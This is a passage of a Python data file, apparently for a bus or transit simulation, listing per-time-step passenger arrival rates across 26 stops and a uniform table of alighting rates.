(14.07566642209295, 10.500852555817252, 11.828455065113841, 12.393298907592571, 10.883626794633326, 5.181487770968396, 4.515447034699847, 3.9252116774560997, 5.629094533006126, 2.2467178228596745, 1.7534261794411918, 1.0409029490834167, 0.0, 14.568554100045299, 11.449932439917582, 8.767130897205957, 6.740153468579022, 11.258189066012251, 5.49529634843854, 4.515447034699847, 3.701062693548854, 5.441813397316663, 4.131099635864191, 2.3656910130227686, 0.9546229596197504, 0.0), # 131
(14.018233888667616, 10.445245470722984, 11.798347479100995, 12.354851877514303, 10.853705109666297, 5.171440079678229, 4.49498355954298, 3.918706352551382, 5.620112197052615, 2.238558309150706, 1.7474303512795641, 1.0375692048713792, 0.0, 14.527580131408602, 11.413261253585167, 8.73715175639782, 6.715674927452117, 11.24022439410523, 5.486188893571935, 4.49498355954298, 3.693885771198735, 5.4268525548331485, 4.1182839591714355, 2.3596694958201994, 0.949567770065726, 0.0), # 132
(13.959637750309861, 10.38914640258533, 11.767591902502646, 12.315667848497343, 10.822988140761264, 5.161212437653315, 4.474304652813592, 3.9121988812507547, 5.61097642234588, 2.2302973065505736, 1.7413589984614566, 1.0341792884530125, 0.0, 14.485573234120938, 11.375972172983136, 8.706794992307282, 6.690891919651719, 11.22195284469176, 5.477078433751057, 4.474304652813592, 3.686580312609511, 5.411494070380632, 4.105222616165782, 2.3535183805005295, 0.9444678547804848, 0.0), # 133
(13.899819821776152, 10.332466789719687, 11.736135786885072, 12.275683239814924, 10.791443755911033, 5.150779081315248, 4.453373937334223, 3.9056583034192958, 5.601660915073669, 2.2219180717036497, 1.7351991882340478, 1.030727070447689, 0.0, 14.442484938440934, 11.337997774924577, 8.675995941170239, 6.6657542151109475, 11.203321830147338, 5.467921624787015, 4.453373937334223, 3.6791279152251772, 5.395721877955516, 4.091894413271643, 2.3472271573770147, 0.9393151627017899, 0.0), # 134
(13.838721917822966, 10.275118070441435, 11.703926583814546, 12.234834470740296, 10.759039823108395, 5.14011424708562, 4.432155035927415, 3.8990536589220803, 5.592139381423722, 2.213403861254311, 1.7289379878445184, 1.0272064214747805, 0.0, 14.398266774627231, 11.299270636222584, 8.64468993922259, 6.640211583762932, 11.184278762847445, 5.458675122490913, 4.432155035927415, 3.671510176489728, 5.379519911554198, 4.0782781569134325, 2.340785316762909, 0.9341016427674034, 0.0), # 135
(13.776285853206776, 10.217011683065968, 11.670911744857346, 12.193057960546685, 10.725744210346152, 5.129192171386024, 4.410611571415708, 3.892353987624185, 5.5823855275837895, 2.2047379318469296, 1.7225624645400475, 1.0236112121536591, 0.0, 14.352870272938459, 11.259723333690248, 8.612812322700236, 6.614213795540787, 11.164771055167579, 5.44929558267386, 4.410611571415708, 3.6637086938471604, 5.362872105173076, 4.064352653515563, 2.3341823489714693, 0.9288192439150881, 0.0), # 136
(13.712453442684055, 10.15805906590867, 11.63703872157975, 12.15029012850735, 10.691524785617101, 5.117987090638052, 4.388707166621645, 3.885528329390686, 5.572373059741617, 2.1959035401258813, 1.716059685567815, 1.0199353131036961, 0.0, 14.306246963633242, 11.219288444140656, 8.580298427839075, 6.587710620377642, 11.144746119483234, 5.439739661146961, 4.388707166621645, 3.6557050647414657, 5.345762392808551, 4.050096709502451, 2.3274077443159498, 0.9234599150826065, 0.0), # 137
(13.647166501011277, 10.098171657284933, 11.602254965548024, 12.106467393895517, 10.656349416914047, 5.106473241263299, 4.366405444367763, 3.8785457240866603, 5.56207568408495, 2.1868839427355393, 1.7094167181750008, 1.016172594944264, 0.0, 14.258348376970226, 11.1778985443869, 8.547083590875005, 6.560651828206616, 11.1241513681699, 5.4299640137213245, 4.366405444367763, 3.6474808866166426, 5.3281747084570235, 4.035489131298506, 2.320450993109605, 0.9180156052077213, 0.0), # 138
(13.58036684294491, 10.037260895510144, 11.566507928328454, 12.061526175984431, 10.620185972229777, 5.094624859683358, 4.343670027476608, 3.8713752115771833, 5.551467106801532, 2.1776623963202795, 1.7026206296087845, 1.0123169282947344, 0.0, 14.20912604320803, 11.135486211242075, 8.513103148043921, 6.532987188960837, 11.102934213603064, 5.419925296208056, 4.343670027476608, 3.6390177569166844, 5.3100929861148884, 4.020508725328145, 2.313301585665691, 0.912478263228195, 0.0), # 139
(13.511996283241437, 9.97523821889969, 11.529745061487317, 12.015402894047334, 10.583002319557098, 5.082416182319821, 4.320464538770717, 3.863985831727331, 5.54052103407911, 2.168222157524475, 1.6956584871163454, 1.008362183774479, 0.0, 14.158531492605304, 11.091984021519266, 8.478292435581725, 6.504666472573423, 11.08104206815822, 5.409580164418264, 4.320464538770717, 3.6302972730855863, 5.291501159778549, 4.005134298015779, 2.3059490122974635, 0.9068398380817901, 0.0), # 140
(13.44199663665733, 9.912015065768964, 11.491913816590882, 11.968033967357464, 10.544766326888803, 5.069821445594281, 4.296752601072636, 3.8563466244021805, 5.529211172105429, 2.158546482992501, 1.688517357944864, 1.00430223200287, 0.0, 14.106516255420662, 11.047324552031569, 8.442586789724318, 6.4756394489775015, 11.058422344210857, 5.398885274163053, 4.296752601072636, 3.6213010325673434, 5.272383163444402, 3.989344655785822, 2.2983827633181764, 0.9010922787062696, 0.0), # 141
(13.37030971794905, 9.84750287443335, 11.452961645205429, 11.919355815188066, 10.505445862217693, 5.056814885928333, 4.272497837204901, 3.848426629466808, 5.517511227068235, 2.1486186293687317, 1.6811843093415195, 1.0001309435992793, 0.0, 14.053031861912746, 11.001440379592072, 8.405921546707596, 6.445855888106194, 11.03502245413647, 5.3877972812535315, 4.272497837204901, 3.612010632805952, 5.252722931108846, 3.973118605062689, 2.2905923290410857, 0.8952275340393956, 0.0), # 142
(13.29687734187308, 9.781613083208239, 11.412835998897235, 11.86930485681237, 10.465008793536564, 5.043370739743566, 4.247663869990055, 3.840194886786288, 5.505394905155279, 2.1384218532975416, 1.6736464085534917, 0.9958421891830788, 0.0, 13.998029842340188, 10.954264081013864, 8.368232042767458, 6.415265559892624, 11.010789810310557, 5.376272841500803, 4.247663869990055, 3.6024076712454045, 5.232504396768282, 3.956434952270791, 2.282567199779447, 0.8892375530189309, 0.0), # 143
(13.221641323185896, 9.714257130409019, 11.37148432923257, 11.817817511503629, 10.423422988838217, 5.029463243461577, 4.222214322250639, 3.8316204362256996, 5.492835912554298, 2.1279394114233043, 1.6658907228279605, 0.99142983937364, 0.0, 13.941461726961624, 10.905728233110038, 8.329453614139801, 6.383818234269912, 10.985671825108597, 5.364268610715979, 4.222214322250639, 3.592473745329698, 5.2117114944191085, 3.9392725038345437, 2.2742968658465146, 0.8831142845826383, 0.0), # 144
(13.144543476643964, 9.64534645435108, 11.328854087777719, 11.764830198535075, 10.380656316115449, 5.015066633503958, 4.196112816809195, 3.8226723176501176, 5.479807955453042, 2.1171545603903956, 1.6579043194121055, 0.9868877647903354, 0.0, 13.88327904603568, 10.855765412693687, 8.289521597060528, 6.351463681171186, 10.959615910906084, 5.351741244710165, 4.196112816809195, 3.582190452502827, 5.190328158057724, 3.921610066178359, 2.265770817555544, 0.8768496776682801, 0.0), # 145
(13.065525617003761, 9.574792493349808, 11.284892726098956, 11.710279337179951, 10.33667664336106, 5.000155146292303, 4.169322976488264, 3.813319570924618, 5.4662847400392565, 2.1060505568431886, 1.6496742655531065, 0.9822098360525362, 0.0, 13.82343332982099, 10.804308196577896, 8.248371327765533, 6.318151670529565, 10.932569480078513, 5.338647399294466, 4.169322976488264, 3.5715393902087875, 5.16833832168053, 3.903426445726651, 2.2569785452197917, 0.870435681213619, 0.0), # 146
(12.98452955902176, 9.502506685720592, 11.239547695762546, 11.654101346711496, 10.291451838567841, 4.984703018248201, 4.141808424110385, 3.803531235914277, 5.4522399725006885, 2.094610657426059, 1.6411876284981433, 0.9773899237796149, 0.0, 13.761876108576189, 10.751289161575762, 8.205938142490716, 6.2838319722781755, 10.904479945001377, 5.324943730279988, 4.141808424110385, 3.5605021558915717, 5.145725919283921, 3.884700448903833, 2.2479095391525097, 0.8638642441564175, 0.0), # 147
(12.901497117454435, 9.428400469778822, 11.192766448334778, 11.596232646402957, 10.2449497697286, 4.968684485793251, 4.113532782498101, 3.7932763524841717, 5.437647359025082, 2.082818118783379, 1.6324314754943956, 0.9724218985909429, 0.0, 13.698558912559907, 10.69664088450037, 8.162157377471978, 6.248454356350136, 10.875294718050164, 5.310586893477841, 4.113532782498101, 3.5490603469951787, 5.1224748848643, 3.8654108821343196, 2.2385532896669558, 0.8571273154344385, 0.0), # 148
(12.81637010705826, 9.352385283839885, 11.144496435381926, 11.536609655527563, 10.197138304836129, 4.9520737853490395, 4.084459674473953, 3.7825239604993777, 5.42248060580018, 2.0706561975595257, 1.6233928737890426, 0.9672996311058923, 0.0, 13.63343327203078, 10.640295942164814, 8.116964368945213, 6.211968592678575, 10.84496121160036, 5.295533544699129, 4.084459674473953, 3.5371955609635997, 5.098569152418064, 3.845536551842522, 2.2288992870763855, 0.8502168439854443, 0.0), # 149
(12.729090342589704, 9.274372566219169, 11.09468510847026, 11.475168793358566, 10.147985311883227, 4.934845153337166, 4.054552722860481, 3.771243099824971, 5.406713419013735, 2.058108150398871, 1.614058890629265, 0.9620169919438353, 0.0, 13.566450717247434, 10.582186911382186, 8.070294453146325, 6.174324451196611, 10.81342683802747, 5.27974033975496, 4.054552722860481, 3.524889395240833, 5.0739926559416135, 3.825056264452856, 2.2189370216940523, 0.8431247787471974, 0.0), # 150
(12.63959963880524, 9.194273755232066, 11.043279919166057, 11.411846479169196, 10.097458658862696, 4.916972826179219, 4.023775550480226, 3.759402810326029, 5.390319504853488, 2.0451572339457917, 1.6044165932622414, 0.956567851724143, 0.0, 13.49756277846851, 10.522246368965572, 8.022082966311206, 6.135471701837374, 10.780639009706976, 5.263163934456441, 4.023775550480226, 3.5121234472708704, 5.048729329431348, 3.8039488263897328, 2.2086559838332116, 0.8358430686574607, 0.0), # 151
(12.54783981046135, 9.11200028919396, 10.990228319035603, 11.346579132232703, 10.045526213767326, 4.898431040296793, 3.992091780155732, 3.7469721318676275, 5.373272569507184, 2.0317867048446603, 1.5944530489351527, 0.950946081066188, 0.0, 13.426720985952636, 10.460406891728066, 7.9722652446757625, 6.09536011453398, 10.746545139014367, 5.245760984614678, 3.992091780155732, 3.4988793144977093, 5.022763106883663, 3.7821930440775686, 2.198045663807121, 0.8283636626539964, 0.0), # 152
(12.453752672314497, 9.027463606420243, 10.935477759645158, 11.27930317182232, 9.992155844589925, 4.8791940321114815, 3.9594650347095355, 3.7339201043148416, 5.355546319162572, 2.017979819739852, 1.5841553248951779, 0.945145550589342, 0.0, 13.353876869958444, 10.39660105648276, 7.920776624475889, 6.053939459219555, 10.711092638325145, 5.227488146040779, 3.9594650347095355, 3.485138594365344, 4.996077922294963, 3.759767723940774, 2.187095551929032, 0.8206785096745677, 0.0), # 153
(12.357280039121166, 8.940575145226303, 10.878975692561012, 11.209955017211293, 9.937315419323285, 4.859236038044878, 3.9258589369641825, 3.7202157675327485, 5.337114460007395, 2.0037198352757417, 1.5735104883894968, 0.9391601309129768, 0.0, 13.278981960744572, 10.330761440042743, 7.867552441947483, 6.011159505827224, 10.67422892001479, 5.208302074545848, 3.9258589369641825, 3.4708828843177697, 4.968657709661643, 3.736651672403765, 2.1757951385122025, 0.8127795586569367, 0.0), # 154
(12.258363725637818, 8.851246343927524, 10.820669569349436, 11.138471087672855, 9.880972805960209, 4.838531294518574, 3.891237109742209, 3.705828161386424, 5.317950698229401, 1.9889900080967022, 1.562505606665289, 0.9329836926564644, 0.0, 13.201987788569642, 10.262820619221108, 7.812528033326444, 5.966970024290106, 10.635901396458802, 5.188159425940994, 3.891237109742209, 3.456093781798981, 4.940486402980104, 3.712823695890952, 2.1641339138698874, 0.804658758538866, 0.0), # 155
(12.15694554662093, 8.759388640839303, 10.760506841576703, 11.06478780248025, 9.823095872493491, 4.817054037954164, 3.85556317586616, 3.690726325740946, 5.298028740016334, 1.9737735948471096, 1.5511277469697347, 0.9266101064391765, 0.0, 13.122845883692296, 10.19271117083094, 7.755638734848673, 5.921320784541328, 10.596057480032668, 5.167016856037325, 3.85556317586616, 3.440752884252974, 4.911547936246746, 3.688262600826751, 2.1521013683153405, 0.7963080582581185, 0.0), # 156
(12.05296731682698, 8.664913474277022, 10.698434960809092, 10.988841580906726, 9.76365248691593, 4.79477850477324, 3.8188007581585754, 3.6748793004613884, 5.27732229155594, 1.958053852171337, 1.5393639765500133, 0.9200332428804852, 0.0, 13.041507776371162, 10.120365671685335, 7.696819882750066, 5.87416155651401, 10.55464458311188, 5.1448310206459436, 3.8188007581585754, 3.4248417891237426, 4.881826243457965, 3.662947193635576, 2.1396869921618182, 0.7877194067524566, 0.0), # 157
(11.943489514248384, 8.56599791046598, 10.631455938536474, 10.907723497981493, 9.699926512929064, 4.7702895112293024, 3.780085376742286, 3.6571979682329148, 5.254219782186185, 1.9413463665164579, 1.5268255340103847, 0.9130132752259121, 0.0, 12.954377375064553, 10.043146027485031, 7.634127670051924, 5.824039099549372, 10.50843956437237, 5.120077155526081, 3.780085376742286, 3.407349650878073, 4.849963256464532, 3.6359078326604983, 2.126291187707295, 0.7787270827696345, 0.0), # 158
(11.811658827165445, 8.452495802079234, 10.542317091203984, 10.804772590546145, 9.61620406376707, 4.7354436714732975, 3.734570210708573, 3.6314756885095885, 5.21942787265181, 1.9209123976394986, 1.5113111828317318, 0.9041816698244146, 0.0, 12.840684235072311, 9.94599836806856, 7.556555914158659, 5.762737192918495, 10.43885574530362, 5.084065963913424, 3.734570210708573, 3.3824597653380692, 4.808102031883535, 3.6015908635153826, 2.108463418240797, 0.7684087092799304, 0.0), # 159
(11.655795351846896, 8.323475201859713, 10.429227943941186, 10.678293012490633, 9.51084814010325, 4.689385209644506, 3.6817949987070273, 3.5970661263515646, 5.171960121188613, 1.896482260745158, 1.4926025356292107, 0.893400259851713, 0.0, 12.69827297422973, 9.827402858368842, 7.463012678146054, 5.689446782235472, 10.343920242377227, 5.0358925768921905, 3.6817949987070273, 3.3495608640317895, 4.755424070051625, 3.559431004163545, 2.0858455887882372, 0.7566795638054286, 0.0), # 160
(11.477155287337537, 8.179777273184687, 10.293395962547079, 10.529487004508074, 9.38495266590092, 4.632672092132293, 3.622145156805501, 3.5544003554065204, 5.112442542399476, 1.8682632772683756, 1.4708644412265888, 0.8807689958543429, 0.0, 12.528598471710556, 9.68845895439777, 7.354322206132943, 5.6047898318051255, 10.224885084798952, 4.976160497569129, 3.622145156805501, 3.3090514943802094, 4.69247633295046, 3.509829001502692, 2.058679192509416, 0.7436161157440625, 0.0), # 161
(11.27699483268217, 8.022243179431417, 10.136028612820661, 10.359556807291593, 9.239611565123418, 4.565862285326026, 3.5560061010718473, 3.503909449322135, 5.041501150887273, 1.836462768644093, 1.4462617484476323, 0.8663878283788393, 0.0, 12.333115606688533, 9.530266112167231, 7.231308742238162, 5.509388305932278, 10.083002301774545, 4.9054732290509895, 3.5560061010718473, 3.261330203804304, 4.619805782561709, 3.4531856024305316, 2.0272057225641325, 0.7292948344937653, 0.0), # 162
(11.056570186925597, 7.851714083977169, 9.958333360560937, 10.169704661534322, 9.075918761734068, 4.489513755615068, 3.4837632475739206, 3.4460244817460834, 4.959761961254883, 1.8012880563072504, 1.418959306116109, 0.8503567079717379, 0.0, 12.113279258337407, 9.353923787689116, 7.0947965305805445, 5.40386416892175, 9.919523922509766, 4.824434274444517, 3.4837632475739206, 3.2067955397250487, 4.537959380867034, 3.3899015538447745, 1.9916666721121876, 0.71379218945247, 0.0), # 163
(10.817137549112616, 7.669031150199204, 9.761517671566903, 9.961132807929381, 8.894968179696201, 4.404184469388787, 3.405802012379573, 3.3811765263260463, 4.867850988105186, 1.762946461692788, 1.3891219630557858, 0.8327755851795738, 0.0, 11.870544305830926, 9.160531436975312, 6.945609815278928, 5.288839385078362, 9.735701976210372, 4.733647136856465, 3.405802012379573, 3.1458460495634197, 4.447484089848101, 3.320377602643128, 1.9523035343133808, 0.6971846500181095, 0.0), # 164
(10.559953118288028, 7.475035541474793, 9.546789011637559, 9.735043487169904, 8.697853742973145, 4.310432393036548, 3.3225078115566578, 3.3097966567096977, 4.766394246041056, 1.7216453062356458, 1.35691456809043, 0.8137444105488828, 0.0, 11.606365628342832, 8.951188516037709, 6.7845728404521495, 5.164935918706936, 9.532788492082112, 4.633715319393577, 3.3225078115566578, 3.078880280740391, 4.348926871486572, 3.245014495723302, 1.909357802327512, 0.6795486855886177, 0.0), # 165
(10.286273093496636, 7.270568421181199, 9.315354846571905, 9.492638939949002, 8.485669375528229, 4.208815492947715, 3.234266061173029, 3.2323159465447184, 4.656017749665372, 1.6775919113707654, 1.322501970043808, 0.7933631346262003, 0.0, 11.322198105046873, 8.726994480888202, 6.612509850219039, 5.0327757341122945, 9.312035499330744, 4.525242325162606, 3.234266061173029, 3.0062967806769394, 4.242834687764114, 3.1642129799830014, 1.8630709693143812, 0.6609607655619273, 0.0), # 166
(9.997353673783238, 7.056470952695688, 9.06842264216894, 9.235121406959813, 8.259509001324778, 4.099891735511655, 3.14146217729654, 3.1491654694787847, 4.537347513581013, 1.6309935985330861, 1.2860490177396875, 0.7717317079580612, 0.0, 11.019496615116793, 8.489048787538673, 6.430245088698436, 4.892980795599257, 9.074695027162026, 4.408831657270299, 3.14146217729654, 2.928494096794039, 4.129754500662389, 3.0783738023199385, 1.8136845284337881, 0.6414973593359717, 0.0), # 167
(9.694451058192634, 6.833584299395522, 8.807199864227664, 8.963693128895455, 8.020466544326124, 3.9842190871177325, 3.0444815759950434, 3.0607762991595733, 4.411009552390856, 1.5820576891575493, 1.247720560001835, 0.7489500810910016, 0.0, 10.69971603772634, 8.238450892001017, 6.2386028000091756, 4.746173067472647, 8.822019104781711, 4.285086818823403, 3.0444815759950434, 2.8458707765126663, 4.010233272163062, 2.987897709631819, 1.7614399728455332, 0.6212349363086839, 0.0), # 168
(9.378821445769624, 6.602749624657969, 8.53289397854708, 8.67955634644906, 7.769635928495594, 3.8623555141553156, 2.9437096733363934, 2.9675795092347634, 4.277629880697781, 1.5309915046790952, 1.2076814456540184, 0.7251182045715564, 0.0, 10.364311252049257, 7.976300250287119, 6.038407228270092, 4.592974514037284, 8.555259761395561, 4.154611312928669, 2.9437096733363934, 2.7588253672537966, 3.884817964247797, 2.8931854488163538, 1.706578795709416, 0.6002499658779973, 0.0), # 169
(9.051721035559014, 6.3648080918602945, 8.24671245092618, 8.383913300313743, 7.508111077796515, 3.7348589830137664, 2.8395318853884426, 2.870006173352032, 4.137834513104661, 1.4780023665326634, 1.1660965235200045, 0.7003360289462612, 0.0, 10.014737137259289, 7.7036963184088725, 5.830482617600023, 4.43400709959799, 8.275669026209322, 4.018008642692845, 2.8395318853884426, 2.6677564164384044, 3.7540555388982577, 2.7946377667712485, 1.649342490185236, 0.5786189174418451, 0.0), # 170
(8.7144060266056, 6.12060086437976, 7.949862747163971, 8.077966231182643, 7.23698591619222, 3.602287460082452, 2.7323336282190445, 2.7684873651590554, 3.992249464214377, 1.4232975961531957, 1.1231306424235596, 0.6747035047616515, 0.0, 9.652448572530185, 7.421738552378166, 5.615653212117798, 4.269892788459586, 7.984498928428754, 3.8758823112226777, 2.7323336282190445, 2.5730624714874657, 3.61849295809611, 2.692655410394215, 1.5899725494327943, 0.5564182603981601, 0.0), # 171
(8.368132617954185, 5.870969105593635, 7.643552333059449, 7.762917379748876, 6.9573543676460305, 3.4651989117507385, 2.6225003178960526, 2.663454158303514, 3.8415007486298056, 1.3670845149756323, 1.0789486511884518, 0.648320582564263, 0.0, 9.278900437035686, 7.1315264082068905, 5.3947432559422595, 4.101253544926896, 7.683001497259611, 3.7288358216249198, 2.6225003178960526, 2.475142079821956, 3.4786771838230153, 2.587639126582959, 1.52871046661189, 0.5337244641448761, 0.0), # 172
(8.014157008649567, 5.616753978879182, 7.328988674411616, 7.439968986705571, 6.6703103561212815, 3.3241513044079904, 2.51041737048732, 2.5553376264330825, 3.6862143809538255, 1.309570444434913, 1.0337153986384477, 0.62128721290063, 0.0, 8.89554760994954, 6.83415934190693, 5.168576993192238, 3.9287113333047383, 7.372428761907651, 3.5774726770063157, 2.51041737048732, 2.37439378886285, 3.3351551780606408, 2.479989662235191, 1.4657977348823235, 0.5106139980799257, 0.0), # 173
(7.6537353977365505, 5.358796647613667, 7.00737923701947, 7.110323292745849, 6.376947805581297, 3.179702604443573, 2.3964702020607005, 2.4445688431954404, 3.527016375789314, 1.250962705965979, 0.9875957335973142, 0.5937033463172892, 0.0, 8.503844970445494, 6.53073680949018, 4.93797866798657, 3.7528881178979363, 7.054032751578628, 3.4223963804736166, 2.3964702020607005, 2.2712161460311235, 3.1884739027906486, 2.370107764248617, 1.401475847403894, 0.4871633316012425, 0.0), # 174
(7.288123984259929, 5.097938275174352, 6.679931486682011, 6.7751825385628415, 6.078360639989406, 3.0324107782468537, 2.2810442286840464, 2.331578882238264, 3.36453274773915, 1.19146862100377, 0.9407545048888186, 0.5656689333607753, 0.0, 8.105247397697292, 6.222358266968527, 4.703772524444093, 3.574405863011309, 6.7290654954783, 3.26421043513357, 2.2810442286840464, 2.1660076987477526, 3.039180319994703, 2.2583941795209475, 1.3359862973364023, 0.46344893410675936, 0.0), # 175
(6.91857896726451, 4.835020024938507, 6.347852889198238, 6.435748964849671, 5.775642783308939, 2.882833792207196, 2.164524866425212, 2.216798817209233, 3.199389511406209, 1.131295510983227, 0.8933565613367281, 0.537283924577624, 0.0, 7.701209770878679, 5.910123170353863, 4.46678280668364, 3.39388653294968, 6.398779022812418, 3.103518344092926, 2.164524866425212, 2.0591669944337117, 2.8878213916544695, 2.1452496549498905, 1.2695705778396478, 0.4395472749944098, 0.0), # 176
(6.546356545795092, 4.570883060283395, 6.012350910367152, 6.093224812299459, 5.469888159503225, 2.731529612713966, 2.0472975313520503, 2.100659721756022, 3.0322126813933705, 1.07065069733929, 0.8455667517648098, 0.5086482705143706, 0.0, 7.2931869691634, 5.595130975658075, 4.227833758824048, 3.211952092017869, 6.064425362786741, 2.9409236104584306, 2.0472975313520503, 1.9510925805099755, 2.7349440797516125, 2.0310749374331536, 1.2024701820734305, 0.4155348236621269, 0.0), # 177
(6.172712918896475, 4.306368544586282, 5.6746330159877525, 5.74881232160534, 5.162190692535588, 2.5790562061565305, 1.929747639532414, 1.9835926695263104, 2.863628272303512, 1.0097415015069002, 0.7975499249968301, 0.4798619217175504, 0.0, 6.882633871725203, 5.278481138893053, 3.98774962498415, 3.0292245045207, 5.727256544607024, 2.7770297373368344, 1.929747639532414, 1.8421830043975218, 2.581095346267794, 1.916270773868447, 1.1349266031975505, 0.3914880495078438, 0.0), # 178
(0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0), # 179
)
passenger_allighting_rate = (
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 0
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 1
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 2
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 3
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 4
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 5
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 6
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 7
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 8
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 9
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 10
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 11
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 12
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 13
